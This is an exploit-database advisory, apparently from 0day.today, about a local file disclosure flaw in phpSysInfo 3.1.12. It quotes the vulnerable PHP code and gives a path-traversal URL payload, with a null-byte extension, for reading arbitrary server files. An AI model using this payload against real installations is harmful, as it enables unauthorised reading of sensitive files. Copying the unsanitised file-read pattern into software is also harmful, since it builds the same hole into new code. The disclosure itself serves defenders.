PHPSYSINFO 3.1.12 Local File Disclosure Vulnerability

2016-02-02T00:00:00
ID 1337DAY-ID-24888
Type zdt
Reporter Paulos Yibelo
Modified 2016-02-02T00:00:00

Description

PHPSYSINFO versions 3.1.12 and below suffer from a local file disclosure vulnerability.

                                        
                                            In \apps\phpsysinfo3.1.12/language/language.php


60: echo file_get_contents(APP_ROOT . '/language/' . $lang . '.xml');

is presented where $lang is defined as:

52: $lang = basename($_GET['lang']);

Which can be exploited like

localhost/phpsysinfo/language/language.php?lang=../../../stufftoinclude

which can be extended with nullbytes to contain any other file that isn't
XML too.

#  0day.today [2016-04-19]  #